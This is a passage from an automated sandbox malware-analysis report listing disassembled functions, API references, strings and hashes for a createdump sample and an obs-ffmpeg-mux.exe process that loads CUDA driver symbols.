abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD015189

Strings

MOC, xrefs: 00007FF6FD014F24
RCC, xrefs: 00007FF6FD014F2C

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: EncodePointerabort
String ID: MOC$RCC
API String ID: 1188231555-2084237596
Opcode ID: 97abe66515cb1414aeefc8003222462485e27fa84eefc4111ad6d0138f6fd2ea
Instruction ID: a4bd71b6aaa11158012d792d229db1dd3ccf3e901c837fe8cadd6bf60eb744e3
Opcode Fuzzy Hash: 97abe66515cb1414aeefc8003222462485e27fa84eefc4111ad6d0138f6fd2ea
Instruction Fuzzy Hash: 3191A373A087828AE711CF65D4842AD7BB0F74478CF144129EA9D9B7A5FF38E155C780

Function 00007FF6FD015414 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6FD01543E
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0156A2

Strings

csm, xrefs: 00007FF6FD015463
csm, xrefs: 00007FF6FD0155D2

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 1056e810e0031d83590426beccc43492b2f2866ca19cabfb7471893f0b3bcd0b
Instruction ID: 01bc3bddb3c40e2805c5d0e6b45a7b25bfab18bcfc4e03739a4f7fc9b93eed59
Opcode Fuzzy Hash: 1056e810e0031d83590426beccc43492b2f2866ca19cabfb7471893f0b3bcd0b
Instruction Fuzzy Hash: 5271C2329086928ADB228F25D0547797BB1FB40B9DF048135DAAC8BAE5FF3CE451C780

Function 00007FF6FD01195F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not get the host name for dump name: %d, xrefs: 00007FF6FD011DB2
%%%%%%%%, xrefs: 00007FF6FD011D5C

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID:
String ID: %%%%%%%%$Could not get the host name for dump name: %d
API String ID: 0-4114407318
Opcode ID: 3a1402493b52144332fc7ef885a246e0bef5bb5eddb931c8bdeb75c83dbb8659
Instruction ID: 8b2e480e9ac8cf2e343bb463a6c11e83989b648950d3a4b1ba7414bfb1055cdc
Opcode Fuzzy Hash: 3a1402493b52144332fc7ef885a246e0bef5bb5eddb931c8bdeb75c83dbb8659
Instruction Fuzzy Hash: 9051D323E18B8646E704CF29E4407AA67A1EB817D4F400135EAAD53BE9EF3DE041D780

Function 00007FF6FD015860 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6FD01590A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6FD015936

Strings

csm, xrefs: 00007FF6FD015A36

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 08459d2de849ea082ca6f7467207d0873ef5a0572d3180cf677e49d91fe67cef
Instruction ID: 527cfd16bd1d787f7b1ee00e5df10fbb68d4cbac4ead6409f15c337d03fe9a44
Opcode Fuzzy Hash: 08459d2de849ea082ca6f7467207d0873ef5a0572d3180cf677e49d91fe67cef
Instruction Fuzzy Hash: AC514D72A1874686D720EF15E44026E77B4FB88B98F540134EB9D87BA6FF78E461CB40

Function 00007FF6FD0117E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59networkCOMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6FD0117EB
WSAStartup.WS2_32 ref: 00007FF6FD01186C

Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011475
Part of subcall function 00007FF6FD011450: fprintf.MSPDB140-MSVCRT ref: 00007FF6FD011485
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011494
Part of subcall function 00007FF6FD011450: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114B3
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114BE
Part of subcall function 00007FF6FD011450: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114C7

Strings

Pipe syntax in dump name not supported, xrefs: 00007FF6FD011850
--name, xrefs: 00007FF6FD01180A
string too long, xrefs: 00007FF6FD0117E4

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __acrt_iob_func$StartupXinvalid_argument__stdio_common_vfprintffflushfprintfstd::_
String ID: --name$Pipe syntax in dump name not supported$string too long
API String ID: 1412700758-3183687674
Opcode ID: 937e6b2c28cea08e1eee527b5bf6a7363096d6cc0634c1c423fcc3cad23f2144
Instruction ID: 3162287c396cb1a9404797cd06ee26f2ecd90f48dddef460adb8dec6df5c13cd
Opcode Fuzzy Hash: 937e6b2c28cea08e1eee527b5bf6a7363096d6cc0634c1c423fcc3cad23f2144
Instruction Fuzzy Hash: C301B522A1898196F7659F52EC427EA6360BB4879CF000035EE1C46691FE3CE496C740

Function 00007FF6FD011CE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32 ref: 00007FF6FD011CFA
WSAGetLastError.WS2_32 ref: 00007FF6FD011DA9

Strings

Could not get the host name for dump name: %d, xrefs: 00007FF6FD011DB2
%%%%%%%%, xrefs: 00007FF6FD011D5C

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: ErrorLastgethostname
String ID: %%%%%%%%$Could not get the host name for dump name: %d
API String ID: 3782448640-4114407318
Opcode ID: 320cb389b9e396755b8a5578c83a0b73153155c3fa84c5d330cc0819ada1fb95
Instruction ID: f4708fc89e838b017130f21b5349d8406fd9f4d41a75015ee936394f914606be
Opcode Fuzzy Hash: 320cb389b9e396755b8a5578c83a0b73153155c3fa84c5d330cc0819ada1fb95
Instruction Fuzzy Hash: 6411A022E0864346EB499F21B8517BA22919F867ACF101235EA7F972D6FD3CF04283C0

Function 00007FF6FD014158 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0141B8

Strings

MOC, xrefs: 00007FF6FD014170
csm, xrefs: 00007FF6FD014178
RCC, xrefs: 00007FF6FD014168

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: terminate
String ID: MOC$RCC$csm
API String ID: 1821763600-2671469338
Opcode ID: 2eecf08628838b8288b91de4d166118c23004d29b6453832f1ed38693e8fa958
Instruction ID: 79d171d5845390657fe5de82061769d3bc207794031aec881a1b18f470f00ad4
Opcode Fuzzy Hash: 2eecf08628838b8288b91de4d166118c23004d29b6453832f1ed38693e8fa958
Instruction Fuzzy Hash: 05F04F3691824AD1E764AF91E1410AD7774EF58B8CF595031D728872E2FF7CF4A0C682

Function 00007FF6FD0120C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(-3333333333333333,?,00000000,00007FF6FD0118EE), ref: 00007FF6FD0121E0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6FD01221E

Strings

Invalid process id '%d' error %d, xrefs: 00007FF6FD012447

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Invalid process id '%d' error %d
API String ID: 73155330-4244389950
Opcode ID: bba2875ca5ab07f9a8534c7e54732a79a80581b419c8ee845a73c6edf0a3127c
Instruction ID: 2bd63849f1a41540fd6a01515cf7d0d18b786f1ee1edef00fcb125632ead0ae4
Opcode Fuzzy Hash: bba2875ca5ab07f9a8534c7e54732a79a80581b419c8ee845a73c6edf0a3127c
Instruction Fuzzy Hash: B9311F22B0978295EF14DF2299052A9A3A1EB15BD8F080631DF7D87BD5FE7CF0908380

Function 00007FF6FD013F84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FD01173F), ref: 00007FF6FD013FC8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FD01173F), ref: 00007FF6FD01400E

Strings

csm, xrefs: 00007FF6FD013FFB

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 7531413fd5ba05c8efc2732aab9693bebd0b5d96e62eb0afc70bc4d0601aafd3
Instruction ID: 370cc5e112817c08c4f13d33529d78298769ceb1edba3836706ff570c051005b
Opcode Fuzzy Hash: 7531413fd5ba05c8efc2732aab9693bebd0b5d96e62eb0afc70bc4d0601aafd3
Instruction Fuzzy Hash: 5A115132618B4592EB518F15F44066977A0FB88B88F184234EF9D47BA8FF3DE555C740

Analysis Process: obs-ffmpeg-mux.exePID: 1124, Parent PID: 5176COMMON

Non-executed Functions

Function 00007FF8A7BFB840 Relevance: 372.3, APIs: 121, Strings: 91, Instructions: 1269libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF8A7BFB86D
free.MSVCRT ref: 00007FF8A7BFB876
calloc.MSVCRT ref: 00007FF8A7BFB885
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFB8C8
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFB90A
GetModuleHandleW.KERNEL32 ref: 00007FF8A7BFB913
GetProcAddress.KERNEL32 ref: 00007FF8A7BFB92A
LoadLibraryExW.KERNEL32 ref: 00007FF8A7BFB940
_aligned_free.MSVCRT ref: 00007FF8A7BFB94C
GetProcAddress.KERNEL32 ref: 00007FF8A7BFB98A
GetProcAddress.KERNEL32 ref: 00007FF8A7BFB9C1
GetProcAddress.KERNEL32 ref: 00007FF8A7BFB9F9
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBA31
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBA69
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBAA1
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBAD9
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBB11
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBB49
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBB81
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBBB9
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBBF1
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBC29
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBC61
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBC99
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBCD1
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBD0C
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBD47
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBD82
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBDBD
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBDF8
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBE33
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBE6E
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBEA9
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBEE4
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBF1F
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBF5A
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBF95
GetProcAddress.KERNEL32 ref: 00007FF8A7BFBFD0
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC00B
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC046
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC081
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC0BC
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC0F7
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC132
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC16D
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC1A8
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC1E3
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC21E
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC259
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC294
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC2CF
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC30A
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC345
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC380
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC3BB
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC3F6
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC431
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC46C
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC4A7
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC4E2
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC51D
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC558
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC593
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC5CE
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC609
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC644
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC67F
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC6BA
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC6F5
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC730
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC76B
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC7A6
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC7DE
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC819
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC854
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC88F
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC8CA
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC905
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC940
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC97B
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC9B6
GetProcAddress.KERNEL32 ref: 00007FF8A7BFC9F1
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCA2C
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCA67
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCAA2
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCADD
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCB18
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCB53
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCB8E
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCBC9
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCC04
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCC3F
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCC7A
_errno.MSVCRT ref: 00007FF8A7BFCCBA
GetModuleHandleW.KERNEL32 ref: 00007FF8A7BFCCD7
GetProcAddress.KERNEL32 ref: 00007FF8A7BFCCEE
LoadLibraryExA.KERNEL32 ref: 00007FF8A7BFCD08
FreeLibrary.KERNEL32 ref: 00007FF8A7BFCD4B
free.MSVCRT ref: 00007FF8A7BFCD54
_aligned_free.MSVCRT ref: 00007FF8A7BFD0AA
_aligned_free.MSVCRT ref: 00007FF8A7BFD0B1

Strings

cuMemFree_v2, xrefs: 00007FF8A7BFBCCA, 00007FF8A7BFBCD3
cuGetErrorString, xrefs: 00007FF8A7BFBF8E, 00007FF8A7BFBF97
cuMemcpy2DAsync_v2, xrefs: 00007FF8A7BFBDB6, 00007FF8A7BFBDBF
cuEventRecord, xrefs: 00007FF8A7BFC33E, 00007FF8A7BFC347
cuCtxSetLimit, xrefs: 00007FF8A7BFBB0A, 00007FF8A7BFBB13
cuGraphicsSubResourceGetMappedArray, xrefs: 00007FF8A7BFC729, 00007FF8A7BFC732
cuGraphicsMapResources, xrefs: 00007FF8A7BFC6B3, 00007FF8A7BFC6BC
cuGraphicsUnmapResources, xrefs: 00007FF8A7BFC6EE, 00007FF8A7BFC6F7
cuGraphicsUnregisterResource, xrefs: 00007FF8A7BFC678, 00007FF8A7BFC681
cuCtxGetDevice, xrefs: 00007FF8A7BFBFC9, 00007FF8A7BFBFD2
cuEGLStreamProducerDisconnect, xrefs: 00007FF8A7BFCB11, 00007FF8A7BFCB1A
cuDestroyExternalSemaphore, xrefs: 00007FF8A7BFC974, 00007FF8A7BFC97D
cuMemAllocManaged, xrefs: 00007FF8A7BFBC5A, 00007FF8A7BFBC63
cuStreamDestroy_v2, xrefs: 00007FF8A7BFC1DC, 00007FF8A7BFC1E5
cuTexObjectCreate, xrefs: 00007FF8A7BFC58C, 00007FF8A7BFC595
cuDevicePrimaryCtxRelease, xrefs: 00007FF8A7BFC03F, 00007FF8A7BFC048
cuMemcpyDtoHAsync_v2, xrefs: 00007FF8A7BFBEA2, 00007FF8A7BFBEAB
cuGraphicsResourceGetMappedPointer_v2, xrefs: 00007FF8A7BFC764, 00007FF8A7BFC76D
cuModuleUnload, xrefs: 00007FF8A7BFC4DB, 00007FF8A7BFC4E4
cuGraphicsGLRegisterImage, xrefs: 00007FF8A7BFC63D, 00007FF8A7BFC646
cuStreamSynchronize, xrefs: 00007FF8A7BFC1A1, 00007FF8A7BFC1AA
cuMemcpy2D_v2, xrefs: 00007FF8A7BFBD7B, 00007FF8A7BFBD84
Cannot load optional %s, xrefs: 00007FF8A7BFCD70, 00007FF8A7BFCD90, 00007FF8A7BFCDB0, 00007FF8A7BFCDD0, 00007FF8A7BFCDF0, 00007FF8A7BFCE10, 00007FF8A7BFCE30, 00007FF8A7BFCE50, 00007FF8A7BFCE70, 00007FF8A7BFCE90, 00007FF8A7BFCEB0, 00007FF8A7BFCED0, 00007FF8A7BFCEF0, 00007FF8A7BFCF10, 00007FF8A7BFCF30, 00007FF8A7BFCF50
cuDevicePrimaryCtxRetain, xrefs: 00007FF8A7BFC004, 00007FF8A7BFC00D
cuDeviceGetUuid, xrefs: 00007FF8A7BFC79F, 00007FF8A7BFC7A8
cuEventQuery, xrefs: 00007FF8A7BFC303, 00007FF8A7BFC30C
cuStreamAddCallback, xrefs: 00007FF8A7BFC217, 00007FF8A7BFC220
cuMemAllocPitch_v2, xrefs: 00007FF8A7BFBC22, 00007FF8A7BFBC2B
cuDeviceGetCount, xrefs: 00007FF8A7BFB9BA, 00007FF8A7BFB9C3
cuExternalMemoryGetMappedMipmappedArray, xrefs: 00007FF8A7BFC888, 00007FF8A7BFC891
cuDevicePrimaryCtxSetFlags, xrefs: 00007FF8A7BFC07A, 00007FF8A7BFC083
Loaded sym: %s, xrefs: 00007FF8A7BFB99F, 00007FF8A7BFB9D7, 00007FF8A7BFBA0F, 00007FF8A7BFBA47, 00007FF8A7BFBA7F, 00007FF8A7BFBAB7, 00007FF8A7BFBAEF, 00007FF8A7BFBB27, 00007FF8A7BFBB5F, 00007FF8A7BFBB97, 00007FF8A7BFBBCF, 00007FF8A7BFBC07, 00007FF8A7BFBC3F, 00007FF8A7BFBC77, 00007FF8A7BFBCAF, 00007FF8A7BFBCEA, 00007FF8A7BFBD25, 00007FF8A7BFBD60, 00007FF8A7BFBD9B, 00007FF8A7BFBDD6, 00007FF8A7BFBE11, 00007FF8A7BFBE4C, 00007FF8A7BFBE87, 00007FF8A7BFBEC2, 00007FF8A7BFBEFD, 00007FF8A7BFBF38, 00007FF8A7BFBF73, 00007FF8A7BFBFAE, 00007FF8A7BFBFE9, 00007FF8A7BFC024, 00007FF8A7BFC05F, 00007FF8A7BFC09A, 00007FF8A7BFC0D5, 00007FF8A7BFC110, 00007FF8A7BFC14B, 00007FF8A7BFC186, 00007FF8A7BFC1C1, 00007FF8A7BFC1FC, 00007FF8A7BFC237, 00007FF8A7BFC272, 00007FF8A7BFC2AD, 00007FF8A7BFC2E8, 00007FF8A7BFC323, 00007FF8A7BFC35E, 00007FF8A7BFC399, 00007FF8A7BFC3D4, 00007FF8A7BFC40F, 00007FF8A7BFC44A, 00007FF8A7BFC485, 00007FF8A7BFC4C0, 00007FF8A7BFC4FB, 00007FF8A7BFC536, 00007FF8A7BFC571, 00007FF8A7BFC5AC, 00007FF8A7BFC5E7, 00007FF8A7BFC622, 00007FF8A7BFC65D, 00007FF8A7BFC698, 00007FF8A7BFC6D3, 00007FF8A7BFC70E, 00007FF8A7BFC749, 00007FF8A7BFC784, 00007FF8A7BFC7BC, 00007FF8A7BFC7F7, 00007FF8A7BFC832, 00007FF8A7BFC86D, 00007FF8A7BFC8A8, 00007FF8A7BFC8E3, 00007FF8A7BFC91E, 00007FF8A7BFC959, 00007FF8A7BFC994, 00007FF8A7BFC9CF, 00007FF8A7BFCA0A, 00007FF8A7BFCA45, 00007FF8A7BFCA80, 00007FF8A7BFCABB, 00007FF8A7BFCAF6, 00007FF8A7BFCB31, 00007FF8A7BFCB6C, 00007FF8A7BFCBA7, 00007FF8A7BFCBE2, 00007FF8A7BFCC1D, 00007FF8A7BFCC58, 00007FF8A7BFCC93
cuStreamCreate, xrefs: 00007FF8A7BFC12B, 00007FF8A7BFC134
cuLaunchKernel, xrefs: 00007FF8A7BFC379, 00007FF8A7BFC382
SetDefaultDllDirectories, xrefs: 00007FF8A7BFB920, 00007FF8A7BFCCE4
cuWaitExternalSemaphoresAsync, xrefs: 00007FF8A7BFC9EA, 00007FF8A7BFC9F3
cuEGLStreamProducerReturnFrame, xrefs: 00007FF8A7BFCBC2, 00007FF8A7BFCBCB
cuLinkCreate, xrefs: 00007FF8A7BFC3B4, 00007FF8A7BFC3BD
cuMipmappedArrayGetLevel, xrefs: 00007FF8A7BFC8C3, 00007FF8A7BFC8CC
cuMemAlloc_v2, xrefs: 00007FF8A7BFBBEA, 00007FF8A7BFBBF3
cuMemcpyDtoH_v2, xrefs: 00007FF8A7BFBE67, 00007FF8A7BFBE70
cuDeviceGetName, xrefs: 00007FF8A7BFBA62, 00007FF8A7BFBA6B
kernel32.dll, xrefs: 00007FF8A7BFB90C, 00007FF8A7BFCCD0
cuMipmappedArrayDestroy, xrefs: 00007FF8A7BFC8FE, 00007FF8A7BFC907
cuModuleGetFunction, xrefs: 00007FF8A7BFC516, 00007FF8A7BFC51F
cuEGLStreamConsumerDisconnect, xrefs: 00007FF8A7BFCB4C, 00007FF8A7BFCB55
cuDeviceGet, xrefs: 00007FF8A7BFB9F2, 00007FF8A7BFB9FB
cuExternalMemoryGetMappedBuffer, xrefs: 00007FF8A7BFC84D, 00007FF8A7BFC856
cuLinkComplete, xrefs: 00007FF8A7BFC42A, 00007FF8A7BFC433
cuMemcpyDtoDAsync_v2, xrefs: 00007FF8A7BFBF18, 00007FF8A7BFBF21
cuGetErrorName, xrefs: 00007FF8A7BFBF53, 00007FF8A7BFBF5C
cuCtxPopCurrent_v2, xrefs: 00007FF8A7BFBB7A, 00007FF8A7BFBB83
cuD3D11GetDevice, xrefs: 00007FF8A7BFCBFD, 00007FF8A7BFCC06
cuEventSynchronize, xrefs: 00007FF8A7BFC2C8, 00007FF8A7BFC2D1
cuMemcpyAsync, xrefs: 00007FF8A7BFBD40, 00007FF8A7BFBD49
cuMemcpy, xrefs: 00007FF8A7BFBD05, 00007FF8A7BFBD0E
